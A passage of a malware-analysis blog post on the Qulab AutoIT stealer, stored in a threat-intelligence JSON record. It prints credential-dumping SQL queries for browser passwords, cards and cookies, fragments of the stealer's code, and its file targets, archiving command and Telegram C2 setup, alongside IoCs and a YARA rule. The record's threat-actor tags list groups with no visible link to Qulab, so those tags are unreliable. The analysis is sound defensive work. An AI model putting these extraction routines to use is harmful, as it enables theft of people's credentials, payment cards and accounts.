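            print(dump_logins(p))
        elif p.endswith('Cookies'):
            print('\n'.join(cookies_netscape(p)))
        else:
            print('grab:', p)
```

The browser normally holds a lock on these databases while it runs; a stealer (and an analyst reproducing it) copies the file first, which is also why the file search and the SQL step are two separate passes.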
After inspecting and storing data from the browsers present in the list, the serious business begins… One of the binaries hardcoded in base64 is finally decoded and used to get some juicy data; as always, it is the popular sqlite3.dll that was hiding inside all of this.\r\nSomething interesting to note is that the developer adjusted the official AutoIT UDF for SQLite3 and removed all the network tasks, to avoid downloading the libraries (32 or 64 bits) and, of course, to be less detectable.\r\nThe file is saved into the %ROAMING% directory with the name:\r\nPE_Name + “.sqlite3.module.dll”\r\nThe routine remains the same each time this library is required:\r\n1. Check, with a patched _SQLite_GetTable2d, that the SQL statement to execute is a valid one.\r\n2. Loop over the returned table; each row of the array is verified against a specific regular expression.\r\n3. If the content is found, it enters another condition that simply adds it to the list of files \u0026 information that will be pushed into the malicious archive.\r\nIn the end, these queries are executed on the browser files:\r\nSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards;\r\nSELECT username_value, password_value, origin_url, action_url FROM logins;\r\nselect host, 'FALSE' as flag, path, case when isSecure = 1 then 'TRUE' else 'FALSE' end as secure, ex\r\nselect host_key, 'FALSE' as flag, path, case when is_secure = 1 then 'TRUE' else 'FALSE' end as secu\r\nThe first two target the Chromium Web Data (credit_cards) and Login Data (logins) databases. The last two, truncated here, dump cookies from the Firefox (cookies.sqlite, isSecure) and Chromium (Cookies, is_secure) schemas; the 'FALSE' as flag and TRUE/FALSE secure columns are the layout of a Netscape cookies.txt file, ready to be imported by the buyer.\r\nCurrent list of supported browsers:\r\n360 Browser, Amigo, AVAST Browser, Blisk, Breaker Browser, Chromium, Chromodo, CocCoc, CometNetwork Browser, Comodo Dragon, CyberFox, Flock Browser, Ghost Browser, Google Chrome, IceCat, IceDragon, K-Meleon Browser, Mozilla Firefox, NETGATE Browser, Opera, Orbitum Browser, Pale Moon, QIP Surf, SeaMonkey, Torch, UCBrowser, uCOZ Media, Vivaldi, Waterfox, Yandex Browser\r\nFTP\r\nThe FTP part is rudimentary but does the job; as far as it looks, it only targets the FileZilla software.\r\nGrabber\r\nQulab does not have an advanced grabber feature; it is really simplistic compared to stealers like Vidar. 
It boils down to one simple line… It uses the same function explained above for the browsers, the only difference being that it searches for specific file formats in the Desktop directory.\r\nTargeted files are:\r\n.txt\r\n.maFile\r\nwallet.dat\r\nWallet\r\nNothing more to say than that Exodus is the main target.\r\nDiscord\r\nDiscord is more and more popular nowadays, so it is now routine to see this software targeted by almost every password stealer on the market.\r\nSteam \u0026 Steam Desktop Authenticator\r\nThe routine for Steam is almost identical to the one I explained for Predator, and it will remain the same until Steam changes something in the security of its files (or just their naming convention).\r\n1. Find the Steam path in the registry\r\n2. Search for the config folder\r\n3. Search recursively inside it to grab all the ssfn files\r\nBut! There is something different in this password stealer compared to all the others I have seen so far: it also targets Steam Desktop Authenticator, a third-party software described on its official page as a desktop implementation of Steam’s mobile authenticator app. It searches for a specific and unique file, “.maFile”, already mentioned above in the Grabber and Browser Stealing parts. 
This file contains the sensitive data of the Steam account linked to the mobile authenticator, including the shared secret used to generate the 2FA codes.\r\nSo this malware is heavily targeting Steam:\r\nClipping Steam trade links\r\nStealing Steam sessions\r\nStealing the 2FA main file from a third-party software\r\nInformation log\r\nIt is common for stealers to have an information file that logs important data about the victim’s machine. This is also the case with Qulab. It is not necessary to explain every part; here is simply which command was used to get each piece of information.\r\nOS Version: @OSVersion\r\nOS Architecture: @OSArch\r\nOS Build: @OSBuild\r\nUsername: @UserName\r\nComputer Name: @ComputerName\r\nProcessor: ExecQuery(“SELECT * FROM Win32_Processor”,”WQL”,16+32)\r\nVideo Card: ExecQuery(“SELECT * FROM Win32_VideoController”,”WQL”,16+32)\r\nMemory: STRINGFORMAT(“%.2f Gb”,MEMGETSTATS()[1]/1024/1024)\r\nKeyboard Layout ID: @KBLayout\r\nResolution: @DesktopWidth \u0026 @DesktopHeight \u0026 @DesktopDepth \u0026 @DesktopRefresh\r\nNetwork\r\nNot visible in the capture because of the proxy, there is a network request to ipapi.co to get all the network information about the victim’s machine.\r\n$A4AC5512B62=INETREAD(\"https://ipapi.co/json\",3)\r\nThe JSON result is consolidated into one variable and saved for the final log file.\r\nIF STRINGLEN($A4AC5512B62) \u003e 75 THEN\r\n $A2B1F55481F=A4604603206(BINARYTOSTRING($A4AC5512B62))\r\n $A280FD53C4B =\" - IP: \" \u0026A211460135A($A2B1F55481F,\"[ip]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Country: \" \u0026A211460135A($A2B1F55481F,\"[country_name]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - City: \" \u0026A211460135A($A2B1F55481F,\"[city]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Region: \" \u0026A211460135A($A2B1F55481F,\"[region]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - ZipCode: \" 
\u0026A211460135A($A2B1F55481F,\"[postal]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - ISP: \" \u0026A211460135A($A2B1F55481F,\"[org]\") \u0026 EXECUTE(\" @CRLF \")\r\n \u0026\" - Coordinates: \" \u0026A211460135A($A2B1F55481F,\"[latitude]\")\u0026\", \"\u0026A211460135A($A2B1F55\r\n \u0026\" - UTC: \" \u0026A211460135A($A2B1F55481F,\"[utc_offset]\")\u0026\" (\"\u0026A211460135A($A2B1F55481F,\r\nENDIF\r\nSofts\r\nThe installed software list is simply read from the Uninstall registry key:\r\n$A12EF151C00=A5944E0550E(\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\",\"\"\r\nFOR $A51E7205400 = 1 TO $A12EF151C00[0][0]\r\n $A3B1F954B63 \u0026=\" - \"\u0026$A12EF151C00[$A51E7205400][0]\u0026EXECUTE(\" @CRLF \")\r\nNEXT\r\nProcess List\r\nBecause AutoIT is built for automation tasks, almost all the basic WinAPI commands are already integrated, so a simple ProcessList() call stores the list of all running processes in an array.\r\n$A2EEFA54E30=PROCESSLIST()\r\nFOR $A51E7205400=1 TO $A2EEFA54E30[0][0]\r\n $A481FB54A60\u0026=\" - \"\u0026$A2EEFA54E30[$A51E7205400][0]\u0026\" / PID: \"\u0026$A2EEFA54E30[$A51E7205400][1]\u0026EXECUT\r\nNEXT\r\nBy mixing all this data, the log file is finally done:\r\n# /===============================\\\r\n# |=== QULAB CLIPPER + STEALER ===|\r\n# |===============================|\r\n# |==== BUY CLIPPER + STEALER ====|\r\n# |=== http://teleg.run/QulabZ ===|\r\n# \\===============================/\r\nDate: XX.XX.2019, HH:MM:SS\r\nMain Information:\r\n- ...\r\nOther Information:\r\n- ...\r\nSoft / Windows Components / Windows Updates:\r\n- ...\r\nProcess List:\r\n- ...\r\nInstructions log\r\nProbably to help his customers when the malware catches data from specific software other than browsers, an additional file is added to give some explanations on how to complete the task 
after the stealing process, step by\r\nstep, and is stored as “Инструкция по установке.txt” (Russian for “Installation instructions.txt”).\r\nInstructions are unique for each of these:\r\nExodus\r\nDiscord\r\nWallets\r\nSteam\r\nFilezilla\r\nTelegram\r\nSteam Desktop Authentication\r\nGrabber part\r\nArchive Setup\r\nWhen all the stealing tasks are finally done, the folder is ready to be archived, and it’s using\r\nanother encoded payload hardcoded into the script. It’s not really complicated to understand that 7zip is behind\r\nthis huge amount of code.\r\nThe payload is saved into the folder in %APPDATA% with the name PE_Name + “.module.dll”, and a specific task is\r\nexecuted before deleting everything.\r\nARCHIVATE($A271F153721)\r\nRUNWAIT($A271F153721\u0026\" a -y -mx9 -ssw \"\"\"\u0026$A104A053309\u0026\"\\\"\u0026$A63CEC52907\u0026\".7z\"\" \"\"\"\u0026$A104A053309\u0026\"\\1\\*\r\nFILEDELETE($A271F153721)\r\nIf you don’t understand the command, its switches are explained here:\r\na Add\r\ny yes on all queries\r\nmx9 Ultra compression method\r\nssw Compress files open for writing\r\nIn the end, this is an example of a final archive file.\r\nBut it is possible to have all these files \u0026 folders:\r\n\\1\\Passwords.txt\r\n\\1\\Information.txt\r\n\\1\\Screen.jpg\r\n\\1\\AutoFills.txt\r\n\\1\\CreditCards.txt\r\n\\1\\Cookies\r\n\\1\\Desktop TXT Files\r\n\\1\\Discord\r\n\\1\\Telegram\r\n\\1\\Steam\r\n\\1\\Exodus\r\n\\1\\Wallets\r\n\\1\\FileZilla\r\n\\1\\SDA\r\nCleaning process\r\nSimple and effective:\r\nKilling the process\r\nDeleting the script directory\r\nIt’s easily catchable on the monitoring logs.\r\nTelegram Bot as C2?\r\nThis malware is using a 
Telegram bot for communicating \u0026 alerting when data has been stolen. As usual, it’s\r\nusing some UDF functions, so there is nothing really new, and it’s not really complicated to understand how it\r\nworks.\r\nWhen a bot is created, there is a unique authentication token that can be used afterwards for making requests to it:\r\napi.telegram.org/bot/\r\nAlso, it’s using a private proxy when sending the request to the bot.\r\nThese values are used to configure the proxy setting during the HTTP request.\r\nWhat does it look like on the other side?\r\nThis malware is developed by Qulab, and it took seconds to find the official sale post for his stealer/clipper. As usual,\r\nevery marketing detail that you could want to know about it is there.\r\nThis stealer/clipper is sold for 2000 rubles (~30$).\r\nSupport is possible.\r\nLet’s do some funny stuff\r\nI made some really funny and unexpected content by modifying some instructions to make something that is totally\r\nunrelated. 
In a way, patching malware can be really entertaining and interesting!\r\nNote: if you haven’t seen the anime “Konosuba”, you will not understand at all what’s going on :p\r\nAdditional Data\r\nIoC\r\nHashes\r\na915fc346ed7e984e794aa9e0d497137\r\n887fac71dc7e038bc73dc9362585bf70\r\na915fc346ed7e984e794aa9e0d497137\r\nIP\r\nProxy Port\r\nSchedule Task\r\n%PAYLOAD_NAME%\r\nRandom Description\r\nFolders \u0026 Files\r\n%APPDATA%/%RANDOM_FOLDER%/\r\n%APPDATA%/%RANDOM_FOLDER%/1/\r\n%PAYLOAD_NAME%.module.exe (7zip)\r\n%PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)\r\nThreat Actor\r\nQulab\r\nMITRE ATT\u0026CK\r\nDiscovery – System Information Discovery\r\nDiscovery – System Time Discovery\r\nDiscovery – Query Registry\r\nDiscovery – Process Discovery\r\nExecution – Execution through Module Load\r\nCredential Access – Credentials in Files\r\nCollection – Screen Capture\r\nCollection – Data from Local System\r\nExfiltration – Data Compressed\r\nSoftware \u0026 Language used\r\nAutoIT\r\nAut2Exe (Decompiler)\r\nmyAut2Exe (Decompiler)\r\nCFF Explorer\r\nx32dbg\r\nPython\r\nYara\r\nrule Qulab_Stealer : Qulab\r\n{\r\n meta:\r\n description = \"Yara rule for detecting Qulab (In memory only)\"\r\n author = \"Fumik0_\"\r\n strings:\r\n $s1 = \"QULAB CLIPPER + STEALER\" wide ascii\r\n $s2 = \"SDA\" wide ascii\r\n $s3 = \"SELECT * FROM Win32_VideoController\" wide ascii\r\n $s4 = \"maFile\" wide ascii\r\n $s5 = \"Exodus\" wide ascii\r\n \r\n condition:\r\n all of ($s*)\r\n}\r\nConclusion\r\nWell, it’s cool sometimes to dig into some stuff that is not really common for the language choice (from my point of\r\nview for this malware). 
It’s entertaining and always worth it to learn new content, find new tools, and find a new\r\nperspective by putting your head into some totally unknown fields.\r\nQulab stealer is interesting just for the fact that it is using AutoIT and abusing a Telegram bot for sharing some data, but\r\nits stealing \u0026 clipper features remain the same as all the other stealers. The other thing is that it also confirms that\r\nmore and more people are using free User Defined Functions/Libraries to do good or bad things; this trend\r\nwill be more and more common these days: developers or simple users lacking skills now just do\r\nsome Google research and will be able to make a piece of software or a malware without knowing anything in depth about\r\nwhat the code is doing, and once the task is done, nothing else matters in the end.\r\nBut I admit, I really took pleasure in patching it for stupid \u0026 totally useless stuff 🙂\r\nNow it’s time for a break.\r\n#HappyHunting\r\nSpecial thanks: @siri_urz, @hh86_\r\nSource: https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/"
	],
	"report_names": [
		"lets-play-with-qulab-an-exotic-malware-developed-in-autoit"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e993faab-f941-4561-bd87-7c33d609a4fc",
			"created_at": "2022-10-25T16:07:23.460301Z",
			"updated_at": "2026-04-10T02:00:04.617715Z",
			"deleted_at": null,
			"main_name": "Longhorn",
			"aliases": [
				"APT-C-39",
				"Platinum Terminal",
				"The Lamberts"
			],
			"source_name": "ETDA:Longhorn",
			"tools": [
				"Black Lambert",
				"Blue Lambert",
				"Corentry",
				"Cyan Lambert",
				"Fluxwire",
				"Gray Lambert",
				"Green Lambert",
				"Magenta Lambert",
				"Pink Lambert",
				"Plexor",
				"Purple Lambert",
				"Silver Lambert",
				"Violet Lambert",
				"White Lambert"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "70db80bd-31b7-4581-accb-914cd8252913",
			"created_at": "2023-01-06T13:46:38.57727Z",
			"updated_at": "2026-04-10T02:00:03.028845Z",
			"deleted_at": null,
			"main_name": "Longhorn",
			"aliases": [
				"the Lamberts",
				"APT-C-39",
				"PLATINUM TERMINAL"
			],
			"source_name": "MISPGALAXY:Longhorn",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "23dfc9f5-1862-4510-a6ae-53d8e51f17b1",
			"created_at": "2024-05-01T02:03:08.146025Z",
			"updated_at": "2026-04-10T02:00:03.67072Z",
			"deleted_at": null,
			"main_name": "PLATINUM TERMINAL",
			"aliases": [
				"APT-C-39 ",
				"Longhorn ",
				"The Lamberts ",
				"Vault7 "
			],
			"source_name": "Secureworks:PLATINUM TERMINAL",
			"tools": [
				"AfterMidnight",
				"Assassin",
				"Marble Framework"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434431,
	"ts_updated_at": 1775826680,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.pdf",
		"text": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.txt",
		"img": "https://archive.orkl.eu/061edf663622d396aedb795093b66293f85101e6.jpg"
	}
}